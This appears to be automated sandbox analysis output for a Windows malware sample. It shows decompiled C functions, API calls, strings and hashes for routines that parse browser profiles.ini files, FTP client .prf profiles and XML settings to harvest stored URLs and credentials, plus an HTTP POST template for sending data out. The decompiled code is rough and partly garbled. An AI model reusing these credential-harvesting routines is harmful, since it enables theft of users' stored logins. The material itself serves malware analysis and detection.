POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403EE6

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Internet$Crack$AllocC113CreateLocalclosesocketlstrlenwsprintf
String ID: <$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
API String ID: 2045778469-2005047030
Opcode ID: df64ba05182c90d56540149d8834a888abe036e083c36425b861e4c09484dc02
Instruction ID: a429c4077cf35c25440d6dd763033275fbd814fdd036323c4685f88714ea5c3a
Opcode Fuzzy Hash: df64ba05182c90d56540149d8834a888abe036e083c36425b861e4c09484dc02
Instruction Fuzzy Hash: 4C41F771D00209EAEF11AFE5CC41BEEBEB9EF08346F10803AF510B52A1D7B95A55DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00409AC1, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00409AC1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				CHAR* _v8;
				CHAR* _v12;
				intOrPtr _v16;
				CHAR* _v20;
				void* _t33;
				void* _t35;
				void* _t36;
				intOrPtr _t38;
				char* _t57;
				char* _t61;
				char* _t62;
				CHAR* _t63;

				_t33 = E00401F7E(_a8);
				if(_t33 != 0) {
					_t35 = E00401F7E(_a12);
					if(_t35 != 0) {
						_t36 = E004025A9(_a8);
						_t37 = _t36;
						if(_t36 != 0) {
							_t38 = E00401DF8(_t37, _a8, 0);
						} else {
							_t38 = E00401DF8(_t37, _a8, "\\");
						}
						_v16 = _t38;
						_v12 = E00401DF8(_t38, _v16, "profiles.ini");
						_v8 = E004018CF(0xfdea);
						_v20 = E004018CF(0x1000);
						if(E00401F36(_v12) != 0 && GetPrivateProfileSectionNamesA(_v8, 0xfde8, _v12) > 2) {
							_t63 = _v8;
							if( *_t63 != 0) {
								do {
									if(StrStrIA(_t63, "Profile") != 0 && GetPrivateProfileStringA(_t63, "Path", 0x414847, _v20, 0xfff, _v12) != 0) {
										if(GetPrivateProfileIntA(_t63, "IsRelative", 1, _v12) != 1) {
											E00409AA9(_a4, _v20, _a12);
										} else {
											_t57 = E00401DF8(_t55, _v16, _v20);
											_push(_t57);
											_t61 = _t57;
											while(1) {
												_t62 = _t61;
												if(_t62 == 0 ||  *_t62 == 0) {
													break;
												}
												if( *_t62 == 0x2f) {
													 *_t62 = 0x5c;
												}
												_t61 = _t62 + 1;
											}
											E00409AA9(_a4, _t57, _a12);
											E004018B8();
										}
									}
									asm("cld");
									asm("repne scasb");
								} while ( *_t63 != 0);
							}
						}
						E004018B8(_v16);
						E004018B8(_v20);
						E004018B8(_v12);
						E004018B8(_v8);
						return E00409AA9(_a4, _a8, _a12);
					} else {
						return _t35;
					}
				} else {
					return _t33;
				}
			}

0x00409ad0
0x00409ad2
0x00409ae1
0x00409ae3
0x00409aed
0x00409af2
0x00409af4
0x00409b0a
0x00409af6
0x00409afe
0x00409afe
0x00409b0f
0x00409b1f
0x00409b2c
0x00409b39
0x00409b46
0x00409b65
0x00409b6b
0x00409b71
0x00409b7e
0x00409bb2
0x00409bf2
0x00409bb4
0x00409bba
0x00409bbf
0x00409bc0
0x00409bcd
0x00409bcd
0x00409bcf
0x00000000
0x00000000
0x00409bc7
0x00409bc9
0x00409bc9
0x00409bcc
0x00409bcc
0x00409bdd
0x00409be2
0x00409be2
0x00409bb2
0x00409bf7
0x00409bff
0x00409c01
0x00409b71
0x00409b6b
0x00409c0c
0x00409c14
0x00409c1c
0x00409c24
0x00409c39
0x00409ae7
0x00409ae7
0x00409ae7
0x00409ad6
0x00409ad6
0x00409ad6

Strings

profiles.ini, xrefs: 00409B12
Path, xrefs: 00409B90
IsRelative, xrefs: 00409BA4
Profile, xrefs: 00409B71

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 0-4107377610
Opcode ID: 05242174d740a931ff5bd0c49c4950aace28accfb88bdea9936157d2b129aa80
Instruction ID: 5ee8cadbbd8b00acdf57b7c0c8cba141a4701fb156d17687039a110dfaec4fae
Opcode Fuzzy Hash: 05242174d740a931ff5bd0c49c4950aace28accfb88bdea9936157d2b129aa80
Instruction Fuzzy Hash: 97412C31A40146BADF227BA1DC02EAE7F72AF51314F14457BB510741E2DBBE9E90AB09

Uniqueness

Uniqueness Score: -1.00%

Function 0040446A, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040446A() {
				char _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t10;
				struct HINSTANCE__* _t15;

				_t4 = GetModuleHandleA("kernel32.dll");
				_t15 = _t4;
				_v8 = 0;
				if(_t4 == 0 || GetProcAddress(_t15, "GetNativeSystemInfo") == 0) {
					L5:
					return 0;
				} else {
					_t10 = GetProcAddress(_t15, "IsWow64Process");
					if(_t10 == 0) {
						goto L5;
					} else {
						 *_t10(GetCurrentProcess(),  &_v8);
						if(_v8 == 0) {
							goto L5;
						} else {
							return 1;
						}
					}
				}
			}

0x00404478
0x0040447d
0x0040447f
0x00404488
0x004044c8
0x004044d1
0x00404499
0x004044a6
0x004044a8
0x00000000
0x004044aa
0x004044b6
0x004044bc
0x00000000
0x004044be
0x004044c7
0x004044c7
0x004044bc
0x004044a8

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404478
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404490
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004044A1
GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004044B0

Strings

GetNativeSystemInfo, xrefs: 0040448A
IsWow64Process, xrefs: 0040449B
kernel32.dll, xrefs: 00404473

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$CurrentHandleModuleProcess
String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
API String ID: 977827838-3073145729
Opcode ID: 52fa25a1187148b6aa2af6f699f797c343cf269405537120f34093dc550733a4
Instruction ID: b4fabcce51f297447bc7e22879592c7cf0400204f4cc9062f02e0cb4fe293c57
Opcode Fuzzy Hash: 52fa25a1187148b6aa2af6f699f797c343cf269405537120f34093dc550733a4
Instruction Fuzzy Hash: C4F0547271020466C710B2B96C45BDF269887C03A6F290A37F105F22C1E9FCDD858278

Uniqueness

Uniqueness Score: -1.00%

Function 0040D854, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040D854(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char _v33;
				char* _v40;
				char* _v44;
				char _v45;
				void* _t28;
				intOrPtr* _t31;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t39;
				void* _t41;
				void* _t50;
				char* _t55;
				char* _t57;

				_t50 = __ecx;
				_t28 = E00401F36(_a8);
				if(_t28 != 0) {
					_t31 = E00401FFD(__eflags, _a8,  &_v20);
					__eflags = _t31;
					if(_t31 != 0) {
						_v24 = E004018CF(_v8);
						E00401906(_v12, _v24, _v8);
						_t55 = _v24;
						while(1) {
							__eflags =  *_t55;
							if( *_t55 == 0) {
								break;
							}
							_t35 = StrStrA(_t55, "<setting name=\"");
							__eflags = _t35;
							if(_t35 != 0) {
								_push("<setting name=\"");
								L0041066A();
								_t57 = _t35 + _t35;
								_v28 = _t57;
								_t37 = StrStrA(_t57, 0x4168f6);
								__eflags = _t37;
								if(_t37 != 0) {
									_v33 =  *_t37;
									_v32 = _t37;
									_t39 = StrStrA(_t57, "value=\"");
									__eflags = _t39;
									if(_t39 != 0) {
										_push("value=\"");
										L0041066A();
										_t55 = _t39 + _t39;
										_v40 = _t55;
										_t41 = StrStrA(_t55, 0x4168f6);
										__eflags = _t41;
										if(_t41 != 0) {
											_v45 =  *_t41;
											_v44 = _t41;
											 *_v32 = 0;
											 *_v44 = 0;
											E0040D7C7(_v44, _t50, _a4, _v28, _v40);
											 *_v32 = _v33;
											 *_v44 = _v45;
											continue;
										}
										break;
									}
									break;
								}
								break;
							}
							break;
						}
						E004018B8(_v24);
						return E00402091( &_v20);
					}
					return _t31;
				} else {
					return _t28;
				}
			}

0x0040d854
0x0040d863
0x0040d865
0x0040d878
0x0040d878
0x0040d87a
0x0040d888
0x0040d894
0x0040d899
0x0040d944
0x0040d944
0x0040d947
0x00000000
0x00000000
0x0040d8ac
0x0040d8ac
0x0040d8ae
0x0040d8b7
0x0040d8bc
0x0040d8c1
0x0040d8c3
0x0040d8d1
0x0040d8d1
0x0040d8d3
0x0040d8d9
0x0040d8dc
0x0040d8ea
0x0040d8ea
0x0040d8ec
0x0040d8f2
0x0040d8f7
0x0040d8fc
0x0040d8fe
0x0040d90c
0x0040d90c
0x0040d90e
0x0040d914
0x0040d917
0x0040d91d
0x0040d923
0x0040d92f
0x0040d93a
0x0040d942
0x00000000
0x0040d942
0x00000000
0x0040d910
0x00000000
0x0040d8ee
0x00000000
0x0040d8d5
0x00000000
0x0040d8b0
0x0040d950
0x00000000
0x0040d959
0x0040d962
0x0040d869
0x0040d869
0x0040d869

Strings

<setting name=", xrefs: 0040D8A1, 0040D8B7
value=", xrefs: 0040D8DF, 0040D8F2

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: <setting name="$value="
API String ID: 0-3468128162
Opcode ID: 7c10b0ec1435bdbb9c2c95abbcad16e27b179bf6e7f3ca8f0351648c8ba48894
Instruction ID: 73fa1e58b4d6e0f5acaca6cd35f95d233c17529f6f8bb818b449ef047748446b
Opcode Fuzzy Hash: 7c10b0ec1435bdbb9c2c95abbcad16e27b179bf6e7f3ca8f0351648c8ba48894
Instruction Fuzzy Hash: B0319272D0425A9ECF11BBE58C419EEBFB19F15318F1440B7E450B2291D6B84A84D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401FFD, Relevance: 10.6, APIs: 7, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00401FFD(void* __eflags, int _a4, void** _a8) {
				void* _t10;
				void* _t11;
				void* _t16;
				void* _t18;
				void** _t22;

				_t22 = _a8;
				_t10 = E004018E6(_t22, 0x10);
				_push(0);
				_push(0);
				_push(3);
				_push(0);
				_push(3);
				_push(0x80000000);
				ExitProcess(_a4);
				 *_t22 = _t10;
				_t11 = _t10 + 1;
				if(_t11 != 0) {
					_t22[3] = GetFileSize(_t11, 0);
					_t16 = CreateFileMappingA( *_t22, 0, 2, 0, 0, 0);
					if(_t16 == 0) {
						CloseHandle( *_t22);
						 *_t22 = 0xffffffff;
					} else {
						_t22[1] = _t16;
						_t18 = MapViewOfFile(_t16, 4, 0, 0, 0);
						_t22[2] = _t18;
						if(_t18 == 0) {
							CloseHandle(_t22[1]);
							CloseHandle( *_t22);
							 *_t22 = 0xffffffff;
						}
					}
				}
				return 0 | _t22[2] != 0x00000000;
			}

0x00402001
0x00402007
0x0040200c
0x0040200e
0x00402010
0x00402012
0x00402014
0x00402016
0x0040201e
0x00402023
0x00402025
0x00402026
0x00402030
0x00402044
0x00402046
0x00402079
0x0040207e
0x00402048
0x00402048
0x00402054
0x00402059
0x0040205e
0x00402063
0x0040206a
0x0040206f
0x0040206f
0x0040205e
0x00402046
0x0040208e

APIs

ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040201E
GetFileSize.KERNEL32(00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040202B
CreateFileMappingA.KERNEL32 ref: 0040203F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003), ref: 00402054
CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000001,00000000,?,80000000), ref: 00402063
CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000001,00000000,?), ref: 0040206A
CloseHandle.KERNEL32(?,?,00000000,00000002,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402079

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseFileHandle$CreateExitMappingProcessSizeView
String ID:
API String ID: 3150701006-0
Opcode ID: daaf07374e8540c6cdb5df11b3425a20ea5e07ebc92b28c0fedbe5a698556156
Instruction ID: d399f326a401a41e3911470efd7f2dd0ea8cd6c92bc63ed3790d9b1a64691747
Opcode Fuzzy Hash: daaf07374e8540c6cdb5df11b3425a20ea5e07ebc92b28c0fedbe5a698556156
Instruction Fuzzy Hash: DD114070680301B7EF312F71CC87F553A94AB41B58F20816677547D1D6DAF998A0861C

Uniqueness

Uniqueness Score: -1.00%

Function 004086D8, Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004086D8(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char* _v12;
				intOrPtr _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				intOrPtr _v32;
				void* _t80;
				char* _t87;
				void* _t101;
				char* _t112;
				char* _t139;
				char* _t140;

				_t137 = __ecx;
				_t136 = __ebx;
				_v16 = E00401082(_t80, __edi, __eflags, _a4);
				if(_v16 >= 0x10) {
					_push(_a4);
					E004012BB(_t81, __eflags);
					_v12 = 1;
					_v8 = E00401364(__eflags, _a4,  &_v12);
					__eflags = _v12;
					if(_v12 == 0) {
						L5:
						return 1;
					} else {
						__eflags = _v8 - 2;
						if(_v8 < 2) {
							goto L5;
						} else {
							__eflags = _v8 - 6;
							if(__eflags <= 0) {
								_t87 = E00401364(__eflags, _a4,  &_v12);
								__eflags = _v12;
								if(_v12 == 0) {
									L8:
									return 1;
								} else {
									__eflags = _t87;
									if(_t87 == 0) {
										__eflags = _v8 - 5;
										if(__eflags < 0) {
											_v32 = E00401364(__eflags, _a4,  &_v12);
											E004013E8( &_v12, __ebx, __ecx, _a4, 4,  &_v12);
										} else {
											E004013E8( &_v12, __ebx, __ecx, _a4, 0x18,  &_v12);
											_v32 = E00401364(__eflags, _a4,  &_v12);
										}
										E00408275(_t136, _t137, _a4,  &_v12);
										__eflags = _v32 - 1;
										if(__eflags == 0) {
											E00408568(_t136, _t137, __eflags, _a4, _a8, _v8,  &_v12);
											E00408275(_t136, _t137, _a4,  &_v12);
										}
										__eflags = _v12;
										if(__eflags != 0) {
											E00408568(_t136, _t137, __eflags, _a4, _a8, _v8,  &_v12);
											__eflags = _v12;
											if(__eflags != 0) {
												_t139 = E00401364(__eflags, _a4,  &_v12);
												while(1) {
													__eflags = _v12;
													if(_v12 == 0) {
														break;
													}
													_t140 = _t139;
													__eflags = _t140;
													if(_t140 != 0) {
														_t101 = E00401522(_a4);
														__eflags = _t101 - _v16;
														if(_t101 != _v16) {
															__eflags = _v8 - 6;
															if(__eflags >= 0) {
																E00401364(__eflags, _a4,  &_v12);
																E00408275(_t136, _t137, _a4,  &_v12);
																E00408275(_t136, _t137, _a4,  &_v12);
															}
															_v20 = E00408426(_t137, __eflags, _a4,  &_v12);
															_v24 = E00408426(_t137, __eflags, _a4,  &_v12);
															_v28 = E00408426(_t137, __eflags, _a4,  &_v12);
															__eflags = _v20;
															if(_v20 != 0) {
																__eflags = _v24;
																if(_v24 != 0) {
																	__eflags = _v28;
																	if(_v28 != 0) {
																		__eflags = _v12;
																		if(_v12 != 0) {
																			_t112 = StrStrIA(_v20, "ftp://");
																			__eflags = _t112;
																			if(_t112 == 0) {
																				_t112 = StrStrIA(_v20, "http://");
																				__eflags = _t112;
																				if(_t112 == 0) {
																					_t112 = StrStrIA(_v20, "https://");
																				}
																			}
																			__eflags = _t112;
																			if(_t112 != 0) {
																				E004015CB(E004015CB(E004015CB(E00401569(_a8, 0xbeef0000), _a8, _v20), _a8, _v24), _a8, _v28);
																			}
																		}
																	}
																}
															}
															E004018B8(_v20);
															E004018B8(_v24);
															E004018B8(_v28);
															_t139 = _t140 - 1;
															__eflags = _t139;
															continue;
														} else {
														}
													}
													break;
												}
												return _v12;
											} else {
												return 0;
											}
										} else {
											return 0;
										}
									} else {
										goto L8;
									}
								}
							} else {
								goto L5;
							}
						}
					}
				} else {
					return 1;
				}
			}

0x004086d8
0x004086d8
0x004086e7
0x004086ee
0x004086fa
0x004086fd
0x00408702
0x00408715
0x00408718
0x0040871c
0x0040872a
0x00408731
0x0040871e
0x0040871e
0x00408722
0x00000000
0x00408724
0x00408724
0x00408728
0x0040873b
0x00408740
0x00408744
0x0040874a
0x00408751
0x00408746
0x00408746
0x00408748
0x00408754
0x00408758
0x00408785
0x00408791
0x0040875a
0x00408763
0x00408774
0x00408774
0x0040879d
0x004087a2
0x004087a6
0x004087b5
0x004087c1
0x004087c1
0x004087c6
0x004087ca
0x004087e3
0x004087e8
0x004087ec
0x00408804
0x00408906
0x00408906
0x0040890a
0x00000000
0x00000000
0x0040890c
0x0040890c
0x0040890e
0x0040880e
0x00408813
0x00408816
0x0040881d
0x00408821
0x0040882a
0x00408836
0x00408842
0x00408842
0x00408853
0x00408862
0x00408871
0x00408874
0x00408878
0x0040887a
0x0040887e
0x00408880
0x00408884
0x00408886
0x0040888a
0x00408899
0x00408899
0x0040889b
0x004088aa
0x004088aa
0x004088ac
0x004088b6
0x004088b6
0x004088ac
0x004088bb
0x004088bd
0x004088e8
0x004088e8
0x004088bd
0x0040888a
0x00408884
0x0040887e
0x004088f0
0x004088f8
0x00408900
0x00408905
0x00408905
0x00000000
0x00000000
0x00408818
0x00408816
0x00000000
0x0040890e
0x00408919
0x004087ee
0x004087f5
0x004087f5
0x004087cc
0x004087d3
0x004087d3
0x00000000
0x00000000
0x00000000
0x00408748
0x00000000
0x00000000
0x00000000
0x00408728
0x00408722
0x004086f0
0x004086f7
0x004086f7

Strings

ftp://, xrefs: 0040888C
https://, xrefs: 004088AE
http://, xrefs: 0040889D

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ftp://$http://$https://
API String ID: 0-2804853444
Opcode ID: a861b8ddab3cd7e1c19046bbce272ce323264d9726407a7c299481b982024a59
Instruction ID: 81f334c42a3cb0fc056165a4037353c858dea4867f82d2d186d61bdc58b91dcb
Opcode Fuzzy Hash: a861b8ddab3cd7e1c19046bbce272ce323264d9726407a7c299481b982024a59
Instruction Fuzzy Hash: 2E61F872800109FEDF11AF91CD45AEEBBB9EB04348F10807BB841B51A1DB798B95DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0FE, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040E0FE(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				char* _v24;
				char* _v28;
				unsigned int _v32;
				intOrPtr _v36;
				void* _t35;
				unsigned int _t38;
				unsigned int _t42;
				unsigned int _t44;
				unsigned int _t45;
				char* _t46;
				unsigned int _t53;
				unsigned int _t57;
				char _t64;
				char* _t65;

				_t35 = E00401F36(_a8);
				if(_t35 != 0) {
					_t38 = E00401FFD(__eflags, _a8,  &_v20);
					__eflags = _t38;
					if(_t38 != 0) {
						_v24 = E004018CF(_v8);
						E00401906(_v12, _v24, _v8);
						_t65 = _v24;
						while(1) {
							__eflags =  *_t65;
							if( *_t65 == 0) {
								break;
							}
							_t42 = StrStrA(_t65, "winex=\"");
							__eflags = _t42;
							if(_t42 != 0) {
								_push("winex=\"");
								L0041066A();
								_t65 = _t42 + _t42;
								_v28 = _t65;
								_t44 = StrStrA(_t65, "\"/>");
								__eflags = _t44;
								if(_t44 != 0) {
									 *_t44 = 0;
									_push(_t44);
									_push( *_t44);
									_push(_v28);
									L0041066A();
									_t45 = _t44;
									__eflags = _t45;
									if(_t45 != 0) {
										_v32 = _t45;
										_v36 = E00402A1D(_t45, _v28);
										_t53 = E00402B0D(_v36, _v32);
										__eflags = _t53;
										if(_t53 != 0) {
											_v32 = _v32 >> 1;
											_t57 = E004043DC(_v36,  &_v32, 0);
											__eflags = _t57;
											if(_t57 != 0) {
												E004015CB(E00401569(_a4, 0xbeef0001), _a4, _v28);
												E0040159F(_a4, _v36, _v32);
											}
										}
										E004018B8(_v36);
									}
									_pop(_t64);
									_pop(_t46);
									 *_t46 = _t64;
									continue;
								}
								break;
							}
							break;
						}
						E00401569(_a4, 0xbeef0002);
						E0040159F(_a4, _v24, _v8);
						E004018B8(_v24);
						return E00402091( &_v20);
					}
					return _t38;
				} else {
					return _t35;
				}
			}

0x0040e10d
0x0040e10f
0x0040e122
0x0040e122
0x0040e124
0x0040e132
0x0040e13e
0x0040e143
0x0040e1fb
0x0040e1fb
0x0040e1fe
0x00000000
0x00000000
0x0040e156
0x0040e156
0x0040e158
0x0040e161
0x0040e166
0x0040e16b
0x0040e16d
0x0040e17b
0x0040e17b
0x0040e17d
0x0040e186
0x0040e189
0x0040e18a
0x0040e18b
0x0040e18e
0x0040e193
0x0040e193
0x0040e195
0x0040e197
0x0040e1a2
0x0040e1ab
0x0040e1b0
0x0040e1b2
0x0040e1b4
0x0040e1c0
0x0040e1c5
0x0040e1c7
0x0040e1dc
0x0040e1ea
0x0040e1ea
0x0040e1c7
0x0040e1f2
0x0040e1f2
0x0040e1f7
0x0040e1f8
0x0040e1f9
0x00000000
0x0040e1f9
0x00000000
0x0040e17f
0x00000000
0x0040e15a
0x0040e20c
0x0040e21a
0x0040e222
0x00000000
0x0040e22b
0x0040e234
0x0040e113
0x0040e113
0x0040e113

Strings

winex=", xrefs: 0040E14B, 0040E161
"/>, xrefs: 0040E170

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "/>$winex="
API String ID: 0-1498080979
Opcode ID: b09a3e927d382e949d7f6434c3017a05fa90477b36eee91e9710b39a97fa2ba0
Instruction ID: a65735a88df2e3c906ae4414ece12a79dd6024024b2867e7669953596bd514cb
Opcode Fuzzy Hash: b09a3e927d382e949d7f6434c3017a05fa90477b36eee91e9710b39a97fa2ba0
Instruction Fuzzy Hash: 43313E3290401ABEDF12ABA2CC02DEE7E76AF44344F10483BF501B51F1D7798A61EB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040816D, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040816D(void* __ebx, void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __edi;
				char* _t9;
				void* _t16;
				void* _t17;
				void* _t18;
				char* _t20;
				char* _t21;

				_t17 = __ecx;
				_t16 = __ebx;
				_v8 = E004015F0(_a4, 0x20, 0);
				_t21 =  *0x4147ed; // 0x640b38
				_t20 =  *0x4147f1; // 0x645e80
				if( *_t20 != 0) {
					do {
						_push(StrStrIA(_t21, "FTPCON"));
						_t9 = StrStrIA(_t20, "FTP CONTROL");
						_pop(_t18);
						if(_t9 != 0) {
							L3:
							E00404351(_a4, E00401E4C(E0040242B(_t24, _t21), _t11, "\\Profiles"), ".prf", 0xbeef0000);
							E004018B8(_t12);
						} else {
							_t24 = _t18;
							if(_t18 != 0) {
								goto L3;
							}
						}
						while( *_t21 != 0) {
							_t21 =  &(_t21[1]);
							__eflags = _t21;
						}
						_t21 =  &(_t21[1]);
						asm("cld");
						_t17 = 0xffffffff;
						asm("repne scasb");
						_t26 =  *_t20;
					} while ( *_t20 != 0);
				}
				return E00401636(_t16, _t17, _t20, _t26, _a4, _v8);
			}

0x0040816d
0x0040816d
0x00408181
0x00408184
0x0040818a
0x00408193
0x00408195
0x004081a0
0x004081a7
0x004081ac
0x004081af
0x004081b5
0x004081d5
0x004081da
0x004081b1
0x004081b1
0x004081b3
0x00000000
0x00000000
0x004081b3
0x004081e2
0x004081e1
0x004081e1
0x004081e1
0x004081e7
0x004081e8
0x004081eb
0x004081f0
0x004081f2
0x004081f2
0x00408195
0x00408204

APIs

StrStrIA.SHLWAPI(00640B38,FTPCON), ref: 0040819B
StrStrIA.SHLWAPI(00645E80,FTP CONTROL,00000000,00640B38,FTPCON), ref: 004081A7

Strings

\Profiles, xrefs: 004081BB
FTP CONTROL, xrefs: 004081A1
FTPCON, xrefs: 00408195
.prf, xrefs: 004081CC

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: .prf$FTP CONTROL$FTPCON$\Profiles
API String ID: 0-2908215140
Opcode ID: 66341082fae2bfb1c9b7f3338323273fc761d7cc8eea500390e92a08a407ca7d
Instruction ID: 25b8ca94bf750d55a6aec51c2f4f4f00567277a79abcf93635d07a7db2700455
Opcode Fuzzy Hash: 66341082fae2bfb1c9b7f3338323273fc761d7cc8eea500390e92a08a407ca7d
Instruction Fuzzy Hash: A8018070600205BADB127A259D02FDF7A59DF81314F34413BB995791E2EA7C5A8292AC

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4C, Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 33
stringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00401E4C(void* __eax, char _a4, intOrPtr _a8) {
				void* _t11;
				void* _t18;

				_t11 = __eax;
				if(_a4 == 0) {
					_a4 = 0x414847;
				}
				if(_a8 == 0) {
					_a8 = 0x414847;
				}
				_push(_a4);
				L0041066A();
				_push(_a8);
				L0041066A();
				_t18 = E004018CF(_t11 + _t11 + 1);
				_push(_a4);
				_push(_t18);
				L0041068E();
				_push(_a8);
				_push(_t18);
				L00410694();
				if(_a4 != 0x414847) {
					_t10 =  &_a4; // 0x414847
					E004018B8( *_t10);
				}
				return _t18;
			}

0x00401e4c
0x00401e54
0x00401e56
0x00401e56
0x00401e61
0x00401e63
0x00401e63
0x00401e6a
0x00401e6d
0x00401e74
0x00401e77
0x00401e85
0x00401e87
0x00401e8a
0x00401e8b
0x00401e90
0x00401e93
0x00401e94
0x00401ea0
0x00401ea2
0x00401ea5
0x00401ea5
0x00401eae

APIs

lstrlen.KERNEL32(?), ref: 00401E6D
lstrlen.KERNEL32(00000000,?), ref: 00401E77
lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
lstrcat.KERNEL32(00000000,00000000), ref: 00401E94

Strings

GHA, xrefs: 00401E63
GHA, xrefs: 00401EA2

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
